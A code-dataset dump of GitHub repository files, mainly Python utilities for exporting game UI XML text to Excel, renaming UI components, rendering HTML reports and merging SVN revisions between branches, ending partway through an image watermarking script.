"num_lines": 2, "path": "/README.md", "repo_name": "vivek07kumar/Prime-number-calculator-using-Sieve-of-Eratosthenes", "src_encoding": "UTF-8", "text": "# Prime-number-calculator-using-Sieve-of-Eratosthenes\nThis program uses an algorithm developed by the Greek mathematician Eratosthenes who lived from 274 B.C. to 195 B.C. Called the Sieve of Eratosthenes, the principle behind the algorithm is simple: Make a list of all the integers two and larger. Two is a prime number, but any multiple of two cannot be a prime number (since a multiple of two has two as a factor). Go through the rest of the list and mark out all multiples of two (4, 6, 8, ...). Move to the next number in the list (in this case, three). If it is not marked out, it must be prime, so go through the rest of the list and mark out all multiples of that number (6, 9, 12, ...). Continue this process until you have listed all the primes you want.\n" } ]
2
litefeel/mfscript
https://github.com/litefeel/mfscript
61e3d1b10745f1a8e0997b0d9dcfa424e60b1b16
f3402e546eb4b68acd9730780b716711427c0cd8
4967e443256ca68a3de90f2ad3c77073a2d6963a
refs/heads/master
2021-06-20T00:44:39.434381
2017-07-10T06:09:20
2017-07-10T06:09:20
92,374,963
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6046270132064819, "alphanum_fraction": 0.6298383474349976, "avg_line_length": 42.21794891357422, "blob_id": "b532a0848fe98410fe54636e2c4fa352087e1410", "content_id": "f45f0e485fd91554ab40bddadd038639c2bee4f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6747, "license_type": "no_license", "max_line_length": 784, "num_lines": 156, "path": "/exportxml.py", "repo_name": "litefeel/mfscript", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# encoding=utf-8\n# pip install openpyxl\n\nimport os, os.path\nimport sys\nimport re\nimport argparse\nimport json\nimport shutil\nfrom openpyxl import load_workbook\nfrom function import readfile, writefile, copyfile\n\n# <com.g2d.studio.ui.edit.gui.UELabel Attributes=\"\" ImageFont=\"\" clip_local_bounds=\"false\" clipbounds=\"false\" enable=\"true\" enable_childs=\"true\" height=\"30\" local_bounds=\"0,0,60,30\" lock=\"true\" name=\"lb_title\" text=\"动作\" textBorderAlpha=\"0.0\" textBorderColor=\"0\" textColor=\"ffffffff\" textFont=\"\" textFontSize=\"20\" text_anchor=\"C_C\" text_offset_x=\"0\" text_offset_y=\"0\" uiAnchor=\"\" uiEffect=\"\" userData=\"\" userTag=\"0\" visible=\"true\" visible_content=\"true\" width=\"60\" x=\"130.0\" y=\"4.0\" z=\"0.0\"/>\n# <com.g2d.studio.ui.edit.gui.UEButton Attributes=\"\" ImageFont=\"\" clip_local_bounds=\"false\" clipbounds=\"false\" enable=\"true\" enable_childs=\"true\" focusTextColor=\"ffffffff\" height=\"35\" imageAnchor=\"C_C\" imageAtlasDown=\"\" imageAtlasUp=\"\" imageOffsetX=\"0\" imageOffsetY=\"0\" imageTextDown=\"\" imageTextUp=\"\" local_bounds=\"0,0,35,35\" lock=\"true\" name=\"btn_close\" text=\"\" textBorderAlpha=\"100.0\" textBorderColor=\"ff000000\" textDown=\"\" textFont=\"\" textSize=\"0\" text_anchor=\"C_C\" text_offset_x=\"0\" text_offset_y=\"0\" uiAnchor=\"\" uiEffect=\"\" unfocusTextColor=\"ffffffff\" userData=\"\" userTag=\"0\" visible=\"true\" visible_content=\"true\" width=\"35\" x=\"807.0\" y=\"-3.0\" z=\"0.0\">\n# <com.g2d.studio.ui.edit.gui.UEToggleButton Attributes=\"\" ImageFont=\"\" clip_local_bounds=\"false\" clipbounds=\"false\" enable=\"true\" enable_childs=\"true\" focusTextColor=\"ffffffff\" height=\"78\" imageAnchor=\"C_C\" imageAtlasDown=\"#dynamic/associate/output/associate.xml|associate|9\" imageAtlasUp=\"#dynamic/associate/output/associate.xml|associate|11\" imageOffsetX=\"-15\" imageOffsetY=\"0\" imageTextDown=\"\" imageTextUp=\"\" isChecked=\"true\" local_bounds=\"0,0,121,78\" lock=\"true\" name=\"tbt_an1\" text=\"\" textBorderAlpha=\"100.0\" textBorderColor=\"ff000000\" textDown=\"\" textFont=\"\" textSize=\"0\" text_anchor=\"C_C\" text_offset_x=\"0\" text_offset_y=\"0\" uiAnchor=\"\" uiEffect=\"\" unfocusTextColor=\"ffffffff\" userData=\"\" userTag=\"0\" visible=\"true\" visible_content=\"true\" width=\"121\" x=\"0.0\" y=\"30.0\" z=\"0.0\">\nP_LABEL = r'^(<com\\.g2d\\.studio\\.ui\\.edit\\.gui\\.(UELabel|UEButton|UEToggleButton) .*? name=\")([^\"]+)(\" .*text=\")([^\"]+)(\".*)$'\n# P_BUTTON = r'^(<com\\.g2d\\.studio\\.ui\\.edit\\.gui\\.UEButton .*? name=\")(btn_([^\"]+))(\" .*text=\")([^\"]+)(\".*)$'\n# P_TBUTTON = r'^(<com\\.g2d\\.studio\\.ui\\.edit\\.gui\\.UEToggleButton .*? name=\")(tbt_([^\"]+))(\" .*text=\")([^\"]+)(\".*)$'\n\n\nerrors = []\n\nclass Config():\n __slots__ = (\"excelDir\", \"xmlDir\", \"backXmlDir\", \"excelTemplate\", \"out\")\n def __init__(self):\n pass\n\n def load(self, path):\n jsonObj = json.loads(readfile(path))\n self.excelDir = jsonObj['excelDir'].decode('utf-8').encode('gb2312')\n self.xmlDir = jsonObj['xmlDir'].decode('utf-8').encode('gb2312')\n self.backXmlDir = jsonObj['backXmlDir'].decode('utf-8').encode('gb2312')\n self.excelTemplate = jsonObj['excelTemplate'].decode('utf-8').encode('gb2312')\n self.out = jsonObj['out'].decode('utf-8').encode('gb2312')\n\n def parse(self, args):\n for k in self.__slots__:\n print(k)\n if args[k] is not None:\n self[k] = args[k].decode('utf-8').encode('gb2312')\n\ndef doKeys(xmlFile, duplicateKeys):\n global errors\n errors.append((xmlFile, duplicateKeys.items()))\n\ndef replaceXml(data, prefix):\n f = lambda g:\"\".join([g.group(1),g.group(3),g.group(4),prefix,g.group(2),g.group(6)])\n return re.sub(P_LABEL, f, data, 0, re.M)\n\ndef checkDuplicateName(name, map, errMap):\n count = map.get(name, 0) + 1\n map[name] = count\n if count > 1:\n errMap[name] = count\n return count > 1\n\ndef guixml2excel(xmlFile, backXmlFile, excelFile, prefix):\n data = readfile(xmlFile)\n matches = re.findall(P_LABEL, data, re.M)\n if len(matches) == 0:\n return\n\n writefile(backXmlFile, replaceXml(data, prefix))\n shutil.copyfile(config.excelTemplate, excelFile)\n\n \n # print(str(matches).encode('utf-8'))\n keys = dict()\n\n # <(name,value)>\n pairs = []\n duplicateKeys = dict()\n for match in matches:\n type = match[1]\n name = match[2]\n if checkDuplicateName(name, keys, duplicateKeys):\n continue\n pairs.append((name, match[4]))\n pairs.sort(key = lambda p: p[0])\n\n row = 2\n wb = load_workbook(excelFile, keep_vba = True)\n ws = wb.active\n for p in pairs:\n c = ws.cell(row=row, column=1)\n c.value = prefix + p[0]\n c = ws.cell(row=row, column=2)\n c.value = p[1]\n row = row + 1\n # print(match[0], match[1], match[2], type(match[2]))\n print(prefix, row - 2)\n wb.save(excelFile)\n if len(duplicateKeys) > 0:\n doKeys(xmlFile, duplicateKeys)\n\ndef doTask(root, file, config):\n name = file[0:-8]\n prefix = name + \"_\"\n xmlFile = os.path.join(root, file)\n excelFile = os.path.join(config.excelDir, '%s.xlsm' % name)\n relpath = os.path.relpath(xmlFile, config.xmlDir)\n backXmlFile = os.path.join(config.backXmlDir, relpath)\n copyfile(xmlFile, backXmlFile)\n guixml2excel(xmlFile, backXmlFile, excelFile, prefix)\n\n# -------------- main ----------------\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(usage='%(prog)s [options] config',\n description='export xmlui to excel')\n parser.add_argument('config', nargs = '?',\n help='config file')\n parser.add_argument('--excelDir', \n help='excelDir')\n parser.add_argument('--xmlDir', \n help='xmlDir')\n parser.add_argument('--backXmlDir', \n help='backXmlDir')\n parser.add_argument('--excelTemplate', \n help='excelTemplate')\n parser.add_argument('-o', '--out', \n help='out')\n\n # (\"excelDir\", \"xmlDir\", \"backXmlDir\", \"excelTemplate\", \"log\")\n args = parser.parse_args()\n # print(args.config)\n # \n config = Config()\n if args.config is not None:\n configPath = os.path.abspath(args.config)\n if not configPath.endswith('.json'):\n configPath = configPath + '.json'\n config.load(configPath)\n\n config.parse(vars(args))\n\n # global errors\n errors = []\n\n if not os.path.exists(config.excelDir):\n os.mkdir(config.excelDir)\n\n if not os.path.exists(config.backXmlDir):\n os.mkdir(config.backXmlDir)\n\n if os.path.exists(config.out):\n os.remove(config.out)\n\n for root, dirs, files in os.walk(config.xmlDir):\n for f in files:\n if f.endswith('.gui.xml'):\n doTask(root, f, config)\n\n if len(errors) > 0:\n from renderhtml import renderhtml\n renderhtml(errors, (\"key\", \"count\"), config.out)\n\n" }, { "alpha_fraction": 0.581818163394928, "alphanum_fraction": 0.581818163394928, "avg_line_length": 5.411764621734619, "blob_id": "ca44e309f801f09e98f642a923a2f891239d3324", "content_id": "694503e836cb99e086c8f4e2d2908d94e48c9f12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 144, "license_type": "no_license", "max_line_length": 20, "num_lines": 17, "path": "/README.md", "repo_name": "litefeel/mfscript", "src_encoding": "UTF-8", "text": "\n#### 安装\n\n~~~\npip install openpyxl\n~~~\n\n\n#### 命令\n\n**rename.bat**\n\n重命名xml中的组件明\n\n\n**export.bat**\n\n导出xml文本到excel\n" }, { "alpha_fraction": 0.633217990398407, "alphanum_fraction": 0.6355248093605042, "avg_line_length": 21.789474487304688, "blob_id": "f3610905500260632aaa213bf48bebe644fe291e", "content_id": "70f635a96f4681a3e67a12d34ce1789493b99ffb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 867, "license_type": "no_license", "max_line_length": 60, "num_lines": 38, "path": "/function.py", "repo_name": "litefeel/mfscript", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# encoding=utf-8\n\nimport os.path\nimport shutil\n\ndef makebasename(filename):\n dir = os.path.dirname(filename)\n if len(dir) > 0 and not os.path.exists(dir):\n os.makedirs(dir)\n\ndef readfile(filename, mode = 'r'):\n if not os.path.exists(filename):\n raise Exception('can not found file: %s' % filename)\n with open(filename, mode) as f:\n data = f.read()\n f.close()\n return data\n\ndef writefile(filename, data, mode = 'w'):\n makebasename(filename)\n with open(filename, mode) as f:\n f.write(data)\n f.close()\n\ndef copyfile(origin, to):\n makebasename(to)\n shutil.copyfile(origin, to)\n\ndef writeyaml(data, filename):\n import yaml\n s = yaml.dump(data)\n writefile(filename, s)\n\ndef readyaml(filename):\n data = readfile(filename)\n import yaml\n return yaml.load(data)\n\n" }, { "alpha_fraction": 0.6028732657432556, "alphanum_fraction": 0.6131349205970764, "avg_line_length": 30.387096405029297, "blob_id": "e7dea21168bddad9a66f1750aa79de764d1ddcfd", "content_id": "d4ee9815da49b572c09f3b925a5ff5b2d028a839", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1949, "license_type": "no_license", "max_line_length": 130, "num_lines": 62, "path": "/renderhtml.py", "repo_name": "litefeel/mfscript", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# encoding=utf-8\n# pip install openpyxl\n\nimport os, os.path\nimport webbrowser\nimport tempfile\nfrom function import readfile, writefile\n\ndef addHead(htmls, filename):\n htmls.append('<hr/><h4>%s</h4>' % filename)\n\ndef addTableHead(htmls):\n htmls.append('<table>')\n\ndef addTableRaw(htmls, names):\n htmls.append('<tr>')\n for name in names:\n htmls.append('<th align=\"left\" width=\"200px\">%s</th>' % name)\n htmls.append('</tr>')\n\ndef addTableTail(htmls):\n htmls.append('</table>')\n\ndef addTable(htmls, list):\n addTableHead(htmls)\n for s in list:\n addTableRaw(htmls, s)\n addTableTail(htmls)\n\ndef printHtml(errors, config):\n htmls = ['<html><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /><body>\\n\\n']\n for arr in errors:\n addTableHead(htmls, os.path.relpath(arr[0], config.xmlDir))\n keys = arr[1]\n for k in sorted(keys.keys()):\n htmls.append('<tr><th align=\"left\" width=\"200px\">%s</th><th>%d</th></tr>' % (k, keys.get(k)))\n keys = arr[2]\n for k in sorted(keys.keys()):\n htmls.append('<tr><th align=\"left\" width=\"200px\"><font color=\"red\">%s</font></th><th>%d</th></tr>' % (k, keys.get(k)))\n addTableTail(htmls)\n htmls.append('</body></html>')\n writefile(config.log, '\\n'.join(htmls))\n webbrowser.open(config.log)\n\n\n\n# errors <(filename, <[oldname, newname, count]>)>\n# tableTitles (...)\ndef renderhtml(errors, tableTitles, htmlfile):\n htmls = ['<html><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /><body>\\n\\n']\n for arr in errors:\n addHead(htmls, arr[0])\n addTable(htmls, arr[1])\n htmls.append('</body></html>')\n\n if htmlfile is None or len(htmlfile) == 0:\n f = tempfile.NamedTemporaryFile(suffix = '.html', delete=False)\n htmlfile = f.name\n\n writefile(htmlfile, ''.join(htmls))\n webbrowser.open(htmlfile)\n\n\n\n" }, { "alpha_fraction": 0.5796061754226685, "alphanum_fraction": 0.5850914120674133, "avg_line_length": 27.102766036987305, "blob_id": "4670f386a891a3c6018028ce188510265948e221", "content_id": "3ac0d6b8f463bfa24f664eb12e62c3e5da66c381", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7110, "license_type": "no_license", "max_line_length": 118, "num_lines": 253, "path": "/svnpatch.py", "repo_name": "litefeel/mfscript", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# encoding=utf-8\n\nimport os\nimport sys\nimport shlex\nimport subprocess\nimport re\nimport tempfile\nimport argparse\nimport json\nimport xml.etree.ElementTree as ET\n\nSVN = r\"C:/Program Files/TortoiseSVN/bin/svn.exe\"\nTortoiseSVN = r\"C:/Program Files/TortoiseSVN/bin/TortoiseProc.exe\"\nBComp = r\"C:/Program Files/Beyond Compare 4/BComp.exe\"\n\nAUTHOR = None\nREVISION = None\nPATH_FROM = None\nPATH_TO = None\nPATH_FROM_NAME = None\n\n# Index: arena/test.lua\n# ===================================================================\n# --- arena/test.lua (revision 62120)\n# +++ arena/test.lua (revision 62121)\n# @@ -63,7 +63,7 @@\nP_ONEPATCH = r'Index:\\s(.*)\\r?\\n={30,}\\r?\\n'\n\nclass Patch:\n \"\"\"docstring for Patch\"\"\"\n __slots__ = ('path', 'content', 'revision', 'names')\n def __init__(self, content, revision):\n # self.path = arg[0]\n # self.names = arg[1]\n self.content = content\n self.revision = revision\n\n# return (output, isOk)\ndef call(cmd, worddir = None, printOutput=False):\n # print(\"call %s\" % cmd)\n output = None\n isOk = True\n if sys.platform == 'win32':\n args = cmd\n else:\n # linux must split arguments\n args = shlex.split(cmd)\n\n if printOutput:\n popen = subprocess.Popen(args, cwd = worddir)\n popen.wait()\n isOk = popen.returncode == 0\n else:\n popen = subprocess.Popen(args, cwd = worddir, stdout = subprocess.PIPE)\n outData, errorData = popen.communicate()\n if sys.version_info >= (3, 0):\n outData = str(outData, encoding = 'utf8')\n isOk = popen.returncode == 0\n output = outData if isOk else errorData\n return (output, isOk)\n\ndef getRevisions():\n cmd = '\"%s\" log -q -r %d:HEAD --xml --search %s' % (SVN, REVISION, AUTHOR)\n output, isOk = call(cmd, PATH_FROM)\n if not isOk:\n # print(output)\n raise Exception('svnerror', output)\n\n root = ET.fromstring(output)\n\n # print len(arr)\n revs = []\n for logentry in root.findall('logentry'):\n author = logentry.find('author').text\n if author == AUTHOR:\n revs.append(int(logentry.get('revision')))\n\n return revs\n\n\n\ndef getLogMsg(revs):\n slist = []\n cmd = '\"%s\" log -r %%d --xml' % SVN\n for rev in revs:\n output, isOk = call(cmd % rev, PATH_FROM)\n if not isOk:\n # print(output)\n raise Exception('svnerror', output)\n\n root = ET.fromstring(output)\n\n for logentry in root.findall('logentry'):\n msg = logentry.find('msg').text\n msg = msg.strip()\n if len(msg) > 0 and msg not in slist:\n slist.append(msg)\n\n return '\\n'.join(slist)\n\ndef createPatch(content, rev):\n # print(content)\n patch = Patch(content, rev)\n patch.names = re.findall(P_ONEPATCH, content)\n\n if sys.version_info >= (3, 0):\n content = content.encode(encoding = 'utf8')\n\n f = tempfile.NamedTemporaryFile(delete=False)\n f.write(content)\n f.close()\n patch.path = f.name\n # print(f.name)\n\n return patch\n\ndef getPatchs(revisions):\n patchs = []\n for rev in revisions:\n output, isOk = call('\"%s\" diff -c %d' % (SVN, rev), PATH_FROM)\n if not isOk:\n raise Exception('svn diff', output)\n\n patchs.append(createPatch(output, rev))\n return patchs\n\n\ndef applyPatchs(patchs):\n for patch in patchs:\n output, isOk = call('\"%s\" patch %s' % (SVN, patch.path), PATH_TO)\n if not isOk:\n raise Exception('svn patch', output)\n else:\n print(output)\n\ndef openCampare(patchs):\n names = set()\n for patch in patchs:\n names.update(patch.names)\n filters = ';'.join(names)\n\n output, isOk = call('%s /iu /filters=\"%s\" %s %s' % (BComp, filters, PATH_FROM, PATH_TO))\n print(output)\n\n\ndef commitPatchs(patchs, msg):\n revisions = ','.join([str(p.revision) for p in patchs])\n logmsg = \"merge from %s %s\\n%s\" % (PATH_FROM_NAME, revisions, msg)\n output, isOk = call('\"%s\" /command:commit /closeonend:0 /path:\"%s\" /logmsg:\"%s\"' % (TortoiseSVN, PATH_TO, logmsg))\n print(output, isOk)\n return isOk\n\ndef updateRepository(path):\n call('%s update \"%s\"' % (SVN, path), printOutput = True)\n\ndef readfile(filename):\n if not os.path.exists(filename):\n raise Exception('can not found file: %s' % filename)\n with open(filename) as f:\n data = f.read()\n f.close()\n return data\n\ndef writefile(filename, data):\n with open(filename, 'w') as f:\n f.write(data)\n f.close()\n\ndef readConfig(path, branch):\n global AUTHOR, PATH_FROM, PATH_TO, REVISION, PATH_FROM_NAME\n j = json.loads(readfile(path))\n AUTHOR = j['author']\n PATH_FROM_NAME = j['from']\n PATH_FROM = branch[j['from']]\n PATH_TO = branch[j['to']]\n REVISION = j['reversion']\n return j\n\ndef writeConfig(path, config):\n data = json.dumps(config, indent = 4)\n writefile(path, data)\n\n# -------------- main ----------------\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(usage='%(prog)s [options] config',\n description='merge svn from $from to $to')\n parser.add_argument('config', \n help='config file')\n parser.add_argument('-b', '--branchs', default = 'branch.json',\n help='branchs config file(default: branch.json)')\n parser.add_argument('-o', '--origin',\n help='from branch')\n parser.add_argument('-t', '--to',\n help='to branch')\n parser.add_argument('-r', '--revs', nargs='*', type=int,\n help='reversion list')\n\n args = parser.parse_args()\n # print(args.config)\n \n\n branchs = dict();\n branchPath = args.branchs\n if not branchPath.endswith('.json'):\n branchPath = branchPath + '.json'\n branchs = json.loads(readfile(branchPath))\n\n configPath = os.path.abspath(args.config)\n if not configPath.endswith('.json'):\n configPath = configPath + '.json'\n config = readConfig(configPath, branchs)\n\n dontSave = False\n if args.origin is not None:\n if args.origin not in branchs:\n raise Exception('can not found origin branch' + origin)\n PATH_FROM = branchs[args.origin]\n PATH_FROM_NAME = args.origin\n dontSave = True\n\n if args.to is not None:\n if args.to not in branchs:\n raise Exception('can not found to branch' + to)\n PATH_TO = branchs[args.to]\n dontSave = True\n\n updateRepository(PATH_TO)\n\n revs = [] if args.revs is None else args.revs[:]\n if len(revs) > 0:\n revs.sort()\n dontSave = True\n else:\n revs = getRevisions()\n\n print(revs)\n if len(revs) == 0:\n print('have not new reversion')\n else:\n msg = getLogMsg(revs)\n patchs = getPatchs(revs)\n applyPatchs(patchs)\n openCampare(patchs)\n if commitPatchs(patchs, msg):\n lastReversion = revs[-1]\n config['reversion'] = lastReversion + 1\n config['lastReversion'] = lastReversion\n if not dontSave:\n writeConfig(configPath, config)\n\n # commitPatchs(None)\n" }, { "alpha_fraction": 0.5933797359466553, "alphanum_fraction": 0.6187700033187866, "avg_line_length": 46.900901794433594, "blob_id": "fd137d2512f292d46173a7a08161ce3beabc449c", "content_id": "d588df3f34ccc6abe28e80ac836f77dc87acbde7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5325, "license_type": "no_license", "max_line_length": 784, "num_lines": 111, "path": "/renameComps.py", "repo_name": "litefeel/mfscript", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# encoding=utf-8\n# pip install openpyxl\n# pip install pyyaml\n\nimport os, os.path\nimport re\nimport argparse\nfrom function import readfile, writefile, writeyaml\n\n# <com.g2d.studio.ui.edit.gui.UELabel Attributes=\"\" ImageFont=\"\" clip_local_bounds=\"false\" clipbounds=\"false\" enable=\"true\" enable_childs=\"true\" height=\"30\" local_bounds=\"0,0,60,30\" lock=\"true\" name=\"lb_title\" text=\"动作\" textBorderAlpha=\"0.0\" textBorderColor=\"0\" textColor=\"ffffffff\" textFont=\"\" textFontSize=\"20\" text_anchor=\"C_C\" text_offset_x=\"0\" text_offset_y=\"0\" uiAnchor=\"\" uiEffect=\"\" userData=\"\" userTag=\"0\" visible=\"true\" visible_content=\"true\" width=\"60\" x=\"130.0\" y=\"4.0\" z=\"0.0\"/>\n# <com.g2d.studio.ui.edit.gui.UEButton Attributes=\"\" ImageFont=\"\" clip_local_bounds=\"false\" clipbounds=\"false\" enable=\"true\" enable_childs=\"true\" focusTextColor=\"ffffffff\" height=\"35\" imageAnchor=\"C_C\" imageAtlasDown=\"\" imageAtlasUp=\"\" imageOffsetX=\"0\" imageOffsetY=\"0\" imageTextDown=\"\" imageTextUp=\"\" local_bounds=\"0,0,35,35\" lock=\"true\" name=\"btn_close\" text=\"\" textBorderAlpha=\"100.0\" textBorderColor=\"ff000000\" textDown=\"\" textFont=\"\" textSize=\"0\" text_anchor=\"C_C\" text_offset_x=\"0\" text_offset_y=\"0\" uiAnchor=\"\" uiEffect=\"\" unfocusTextColor=\"ffffffff\" userData=\"\" userTag=\"0\" visible=\"true\" visible_content=\"true\" width=\"35\" x=\"807.0\" y=\"-3.0\" z=\"0.0\">\n# <com.g2d.studio.ui.edit.gui.UEToggleButton Attributes=\"\" ImageFont=\"\" clip_local_bounds=\"false\" clipbounds=\"false\" enable=\"true\" enable_childs=\"true\" focusTextColor=\"ffffffff\" height=\"78\" imageAnchor=\"C_C\" imageAtlasDown=\"#dynamic/associate/output/associate.xml|associate|9\" imageAtlasUp=\"#dynamic/associate/output/associate.xml|associate|11\" imageOffsetX=\"-15\" imageOffsetY=\"0\" imageTextDown=\"\" imageTextUp=\"\" isChecked=\"true\" local_bounds=\"0,0,121,78\" lock=\"true\" name=\"tbt_an1\" text=\"\" textBorderAlpha=\"100.0\" textBorderColor=\"ff000000\" textDown=\"\" textFont=\"\" textSize=\"0\" text_anchor=\"C_C\" text_offset_x=\"0\" text_offset_y=\"0\" uiAnchor=\"\" uiEffect=\"\" unfocusTextColor=\"ffffffff\" userData=\"\" userTag=\"0\" visible=\"true\" visible_content=\"true\" width=\"121\" x=\"0.0\" y=\"30.0\" z=\"0.0\">\n# PATTERN = r'^(<com\\.g2d\\.studio\\.ui\\.edit\\.gui\\.(UELabel|UEButton|UEToggleButton) .*? name=\")([^\"]+)(\" .*text=\")([^\"]+)(\".*)$'\n# P_BUTTON = r'^(<com\\.g2d\\.studio\\.ui\\.edit\\.gui\\.UEButton .*? name=\")(btn_([^\"]+))(\" .*text=\")([^\"]+)(\".*)$'\n# P_TBUTTON = r'^(<com\\.g2d\\.studio\\.ui\\.edit\\.gui\\.UEToggleButton .*? name=\")(tbt_([^\"]+))(\" .*text=\")([^\"]+)(\".*)$'\n\nCOMPS_PREFIX = {\n \"UELabel\" : \"lb_\",\n \"UEButton\" : \"btn_\",\n \"UEToggleButton\" : \"tbt_\",\n \"UECheckBox\" : \"cb_\",\n \"UEImageBox\" : \"ib_\",\n \"UETextInput\" : \"ti_\",\n \"UETextBox\" : \"tb_\",\n \"UETextBoxHtml\" : \"tbh_\",\n \"UEGauge\" : \"gg_\",\n \"UEScrollPan\" : \"sp_\",\n \"UECanvas\" : \"cvs_\",\n \"UEFileNode\" : \"fn_\",\n # \"UETextInputMultiline\": \"tbt_\",\n}\n\n\narr = [r'^(<com\\.g2d\\.studio\\.ui\\.edit\\.gui\\.)(']\nfor k, v in COMPS_PREFIX.iteritems():\n arr.append(k)\n arr.append('|')\narr.pop()\narr.append(r')(.*? name=\")([^\"]+)(\".*)$')\nPATTERN = ''.join(arr)\n# print('PATTERN', PATTERN)\n\n# for k, v in COMPS_PREFIX.iteritems():\n# name = 'cs_'\n# ratio = difflib.SequenceMatcher(None, name, v).ratio()\n# print(v, name, ratio)\n\n# return newname\ndef checkName(type, name):\n prefix = COMPS_PREFIX[type]\n if name[0:len(prefix)] == prefix:\n return name\n arr = name.split('_', 1)\n if len(arr) == 1:\n return prefix + name\n return prefix + arr[1]\n\ndef renameContent(data):\n pairMap = dict()\n def f(g):\n type = g.group(2)\n name = g.group(4)\n newname = checkName(type, name)\n if name == newname:\n return g.group(0)\n key = '%s;%s' % (name, newname)\n pair = pairMap.get(key, [name, newname, 0])\n pair[2] = pair[2] + 1\n pairMap[key] = pair\n return ''.join([g.group(1), type, g.group(3), newname, g.group(5)])\n return (re.sub(PATTERN, f, data, 0, re.M), pairMap)\n\ndef renameFile(baseDir, dir, name, errors):\n filename = os.path.join(dir, name)\n data = readfile(filename)\n newdata, pairMap = renameContent(data)\n writefile(filename, newdata)\n if len(pairMap) > 0:\n relname = os.path.relpath(filename, baseDir)\n errors.append((relname, pairMap.values()))\n\n# baseDir 目录\n# errors <(filename, [oldname, newname, count])>\ndef renameDir(baseDir, errors):\n for root, dirs, files in os.walk(baseDir):\n for f in files:\n if f.endswith('.gui.xml'):\n renameFile(baseDir, root, f, errors)\n\n\n#-------------- main ----------------\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(usage='%(prog)s [options] config',\n description='rename components name')\n parser.add_argument('xmldir', \n help='xmldir')\n parser.add_argument('-o', '--out', \n help='log file')\n\n args = parser.parse_args()\n errors = []\n xmldir = os.path.abspath(args.xmldir).decode('utf-8').encode('gb2312')\n logfile = args.out\n if logfile is not None:\n logfile = os.path.abspath(logfile).decode('utf-8').encode('gb2312')\n renameDir(xmldir, errors)\n\n if len(errors) > 0:\n from renderhtml import renderhtml\n renderhtml(errors, (\"oldname\", \"newname\", \"count\"), logfile)\n" } ]
6
karsiyakalilar/water-project
https://github.com/karsiyakalilar/water-project
0bc9eb39081984eda15d487c843a15979c0c5705
9bbc36a429bdf8c145408ed01b61338a5e3bf6d9
dff6c46cb8c450dd4228dab129471e7f2958f992
refs/heads/master
2021-01-12T03:12:20.825554
2017-01-15T17:37:25
2017-01-15T17:37:25
78,173,403
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5528714656829834, "alphanum_fraction": 0.5770282745361328, "avg_line_length": 31.029197692871094, "blob_id": "6d3a5bf836c0f641fbb1def8553d75cd255e4eeb", "content_id": "8fba45a38c7150d8de631ff6eb7c6363d93d4d99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4388, "license_type": "no_license", "max_line_length": 91, "num_lines": 137, "path": "/gen_watermark.py", "repo_name": "karsiyakalilar/water-project", "src_encoding": "UTF-8", "text": "# modified version of http://code.activestate.com/recipes/362879/\nfrom PIL import Image, ImageEnhance\nimport random\n\ndef flip_horizontal(im): return im.transpose(Image.FLIP_LEFT_RIGHT)\ndef flip_vertical(im): return im.transpose(Image.FLIP_TOP_BOTTOM)\ndef rotate_180(im): return im.transpose(Image.ROTATE_180)\ndef rotate_90(im): return im.transpose(Image.ROTATE_90)\ndef rotate_270(im): return im.transpose(Image.ROTATE_270)\ndef transpose(im): return rotate_90(flip_horizontal(im))\ndef transverse(im): return rotate_90(flip_vertical(im))\norientation_funcs = [None,\n lambda x: x,\n flip_horizontal,\n rotate_180,\n flip_vertical,\n transpose,\n rotate_270,\n transverse,\n rotate_90\n ]\ndef apply_orientation(im):\n \"\"\"\n Extract the oritentation EXIF tag from the image, which should be a PIL Image instance,\n and if there is an orientation tag that would rotate the image, apply that rotation to\n the Image instance given to do an in-place rotation.\n\n :param Image im: Image instance to inspect\n :return: A possibly transposed image instance\n \"\"\"\n\n try:\n kOrientationEXIFTag = 0x0112\n if hasattr(im, '_getexif'): # only present in JPEGs\n e = im._getexif() # returns None if no EXIF data\n if e is not None:\n print(\"exif found\")\n orientation = e[kOrientationEXIFTag]\n f = orientation_funcs[orientation]\n return f(im)\n else:\n print(\"exif exists as a func but no value returned\")\n return im\n else:\n print(\"no exif found\")\n return im\n\n except:\n print(\"problem applying orientation to the image\")\n return(im)\n\ndef reduce_opacity(im, opacity):\n \"\"\"Returns an image with reduced opacity.\"\"\"\n assert opacity >= 0 and opacity <= 1\n if im.mode != 'RGBA':\n im = im.convert('RGBA')\n else:\n im = im.copy()\n alpha = im.split()[3]\n alpha = ImageEnhance.Brightness(alpha).enhance(opacity)\n im.putalpha(alpha)\n return im\n\ndef watermark(im, mark, position, opacity=1):\n \"\"\"\n Adds a watermark to an image.\n change opacity\n apply orientation\n resize image\n apply watermark\n \"\"\"\n # change opacity\n if opacity < 1:\n mark = reduce_opacity(mark, opacity)\n\n # if im.mode != 'RGBA':\n # im = im.convert('RGBA')\n\n # apply orientation\n im = apply_orientation(im)\n\n # resize image\n if max(im.size) > 1000:\n _aspect_ratio = float(im.size[0]) / float(im.size[1])\n if _aspect_ratio >= 1:\n new_width = 1000\n new_height = int(1000 / _aspect_ratio)\n else:\n new_height = 1000\n new_width = int(1000 * _aspect_ratio)\n\n im = im.resize((new_width, new_height), Image.ANTIALIAS)\n\n # apply watermark\n layer = Image.new('RGBA', im.size, (0,0,0,0))\n if position == 'tile':\n for y in range(0, im.size[1], mark.size[1]):\n for x in range(0, im.size[0], mark.size[0]):\n layer.paste(mark, (x, y))\n elif position == 'scale':\n # crop off extras\n # either diffs[0] or diffs[1] is 